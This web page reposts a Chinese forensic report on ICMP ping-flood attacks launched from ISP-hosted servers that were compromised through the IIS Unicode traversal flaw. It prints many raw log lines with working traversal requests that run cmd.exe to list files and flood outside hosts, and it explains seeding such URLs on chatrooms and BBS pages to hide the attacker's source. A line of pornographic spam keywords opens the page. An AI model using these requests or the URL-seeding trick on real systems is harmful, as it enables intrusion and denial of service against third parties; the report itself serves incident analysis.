国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動(dòng)安全 安全管理 應(yīng)用案例 網(wǎng)絡(luò)威脅 系統(tǒng)安全 應(yīng)用安全 數(shù)據(jù)安全 云安全
當(dāng)前位置: 主頁(yè) > 信息安全 > 移動(dòng)安全 >

ISP與廣東某數(shù)據(jù)分局網(wǎng)絡(luò)攻擊事件分析

時(shí)間:2011-05-01 17:16來(lái)源: 點(diǎn)擊:
因?yàn)檫@兩個(gè)單位的兩起網(wǎng)絡(luò)攻擊事件有著密切聯(lián)系,故一并分析。 廣東某ISP和廣東某數(shù)據(jù)分局網(wǎng)絡(luò)攻擊事件分析。
Tags網(wǎng)絡(luò)攻擊(132)ISP(11)  

  因?yàn)檫@兩個(gè)單位的兩起網(wǎng)絡(luò)攻擊事件有著密切聯(lián)系,故一并分析。

  某:事故發(fā)現(xiàn)及描述

  在3月30日,安絡(luò)工程師陳與ISP進(jìn)行技術(shù)接觸,當(dāng)時(shí),聽(tīng)取其負(fù)責(zé)人王工程師口述,在此之前已有不少異常情況,類(lèi)似攻擊行為。

  在后面的幾天里,安絡(luò)工程師為該ISP裝了一個(gè)網(wǎng)警測(cè)試版,在4月5日,發(fā)現(xiàn)內(nèi)部機(jī)器202.xxx.xxx.219、202.xxx.xxx.237對(duì)外產(chǎn)生大量掃描行為,懷疑該機(jī)早已被,并報(bào)告王工程師。

  在4月10日,發(fā)現(xiàn)ICMP包比例達(dá)到25%以上,確認(rèn)發(fā)生ICMP類(lèi)D.O.S.攻擊,進(jìn)一步觀察攻擊源來(lái)自內(nèi)部托管的用戶主機(jī)202.xxx.xxx.208、202.xxx.xxx.250、202.xxx.xxx.251三臺(tái)機(jī)器,已報(bào)告王工程師。

  某數(shù)據(jù)分局:事故發(fā)現(xiàn)及描述

  在4月6日,深圳安絡(luò)接到某電信要求對(duì)所轄某數(shù)據(jù)分局遭受攻擊查因并解決問(wèn)題的請(qǐng)求。當(dāng)日安絡(luò)工程師王到現(xiàn)場(chǎng),初步了解為D.O.S.攻擊。

  在4月9日,安絡(luò)工程師陳到現(xiàn)場(chǎng)了解了整體網(wǎng)絡(luò)結(jié)構(gòu),提出安裝網(wǎng)警的。

  在4月11日,安絡(luò)工程師王、馮、陳到現(xiàn)場(chǎng)。在該單位工程師配合下,了解到攻擊為ICMP的D.O.S.攻擊。分析其捕捉到的數(shù)據(jù)包。發(fā)現(xiàn)為PING程序的洪水攻擊。進(jìn)一步分析數(shù)據(jù)包,發(fā)現(xiàn)攻擊來(lái)自不同的IP。其中兩個(gè)IP來(lái)自4月10日發(fā)現(xiàn)的上述某ISP三臺(tái)攻擊源其中的兩臺(tái)202.xxx.xxx.250、202.xxx.xxx.251。初步認(rèn)為某ISP和某數(shù)據(jù)分局的兩起網(wǎng)絡(luò)入侵事件有著密切聯(lián)系。(詳細(xì)見(jiàn)圖)

  圖表說(shuō)明:此圖數(shù)據(jù)為4月10號(hào)下午某數(shù)據(jù)分局的8010服務(wù)器(61.xxx.xxx.34)受攻擊時(shí)的網(wǎng)絡(luò)連接圖,其中有來(lái)自外部IP 202.xxx.xxx.251的連接。

  圖表說(shuō)明:此圖數(shù)據(jù)為4月10號(hào)下午某數(shù)據(jù)分局的8010服務(wù)器(61.xxx.xxx.34)受攻擊時(shí)的網(wǎng)絡(luò)數(shù)據(jù)包分析圖,發(fā)現(xiàn)大量來(lái)自202.xxx.xxx.251,202.xxx.xxx.250的ICMP垃圾包。

  某數(shù)據(jù)分局問(wèn)題的解決:

  一、 建議關(guān)閉ICMP通信來(lái)預(yù)防同類(lèi)攻擊,據(jù)該單位負(fù)責(zé)人發(fā)言,已經(jīng)在其交換機(jī)CISCO5509上采取這樣的措施了。

  二、 安裝網(wǎng)警,檢測(cè)看看是否存在其他入侵。目前網(wǎng)警已經(jīng)正常運(yùn)行中。

  三、 聯(lián)系某ISP進(jìn)行取證,發(fā)現(xiàn)入侵源。

  某ISP取證過(guò)程:

  在4月11日下午,安絡(luò)工程師王、馮、陳到某ISP現(xiàn)場(chǎng)取證。

  分析某ISP的網(wǎng)警數(shù)據(jù)發(fā)現(xiàn)ICMP包已經(jīng)超過(guò)30%,攻擊源依然是內(nèi)部托管的用戶主機(jī)202.xxx.xxx.208、202.xxx.xxx.250、202.xxx.xxx.251三臺(tái)機(jī)器,但攻擊目標(biāo)已經(jīng)改變?yōu)?1.xxx.xxx.157(詳細(xì)請(qǐng)看網(wǎng)警運(yùn)行時(shí)的界面,如圖)。在分析過(guò)程中,另外發(fā)現(xiàn)202.xxx.xxx.233也有類(lèi)似被入侵作為掃描源的現(xiàn)象,已報(bào)告王工程師。

  圖表說(shuō)明:攻擊源依然是內(nèi)部托管的用戶主機(jī)202.xxx.xxx.208、202.xxx.xxx.250、202.xxx.xxx.251三臺(tái)機(jī)器,但攻擊目標(biāo)已經(jīng)改變?yōu)?1.xxx.xxx.157

  圖表說(shuō)明:ICMP包已經(jīng)超過(guò)30%

  在某ISP及其客戶的配合下,分析202.xxx.xxx.208 的IIS日志,發(fā)現(xiàn)在3月5日02:45:41已經(jīng)有來(lái)自IP 202.98.223.237使用IIS UNICODE漏洞對(duì)202.xxx.xxx.208進(jìn)行初步入侵。在3月6日起就發(fā)現(xiàn)來(lái)自不同源IP的URL請(qǐng)求使用同一漏洞調(diào)用PING程序?qū)Σ煌墓裟繕?biāo)進(jìn)行攻擊。(具體請(qǐng)看 日志片段)

  2001-03-05 02:45:41 202.98.223.237(第一次攻擊來(lái)源IP) - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir%20c:\ 200 –(第一次攻擊)

  2001-03-06 14:55:22 211.159.7.248 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+211.159.5.9 502 –

  2001-03-06 16:03:09 202.100.207.75 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+202.100.88.68 502 –

  2001-03-06 16:37:52 202.105.40.225 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.140.163.140 502 –

  2001-03-06 17:12:38 61.128.158.33 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.128.137.236 502 -2001-03-06 17:26:14 61.158.242.23 - 202.104.139.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.143.3.140 502 –

  2001-03-06 17:27:39 61.139.23.86 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.139.36.97 502 -

  2001-03-06 18:34:25 61.147.61.202 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+6666+61.132.13.225 502 -

  2001-03-06 19:44:52 61.139.23.86 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+61.141.80.200 502 –

  2001-03-06 23:22:54 24.108.6.81 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+500+216.66.144.94 502 –

  2001-04-10 00:51:21 61.144.246.135 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+100+61.150.227.133 502 -

  2001-04-10 00:52:30 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502 -

  2001-04-10 01:03:19 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502 –

  2001-04-10 01:14:05 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502 –

  2001-04-10 01:17:55 211.98.23.125 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+200+211.98.23.134 502 –

  2001-04-10 01:43:51 211.167.112.14 - 202.xxx.xxx.208 80 GET /scripts/..\../winnt/system32/cmd.exe /c+ping+-l+65000+-n+9999+202.160.249.50 502 –

  結(jié)果分析

  由此看出,在日志中,請(qǐng)求源并非固定的IP,每次PING程序所指定的目標(biāo)主機(jī)也不是固定的。

  在202.xxx.xxx.250的日志文件與此類(lèi)同,在202.xxx.xxx.251機(jī)器上未設(shè)置日志審核,所以沒(méi)有日志記錄。

  用了一定的技巧使請(qǐng)求的源成了隨機(jī)IP(具體做法如:發(fā)使接收者自動(dòng)打開(kāi)URL,在有一定訪問(wèn)量的網(wǎng)頁(yè)上做了這樣的連接,在安全性不高的聊天室,BBS等地方貼出這樣的URL,使用特定的程序來(lái)完成)。

  黑客攻擊的目標(biāo)并不是唯一的。

  分析兩臺(tái)機(jī)器的日志來(lái)看,初次訪問(wèn)這兩臺(tái)機(jī)器這個(gè)漏洞的IP是相同的。所以202.98.223.237是肇事者IP。

  最后,安絡(luò)收集提取有關(guān)電子證據(jù),配合客戶向公安機(jī)關(guān)報(bào)案。目前該案肇事者已被鎖定。

------分隔線----------------------------

推薦內(nèi)容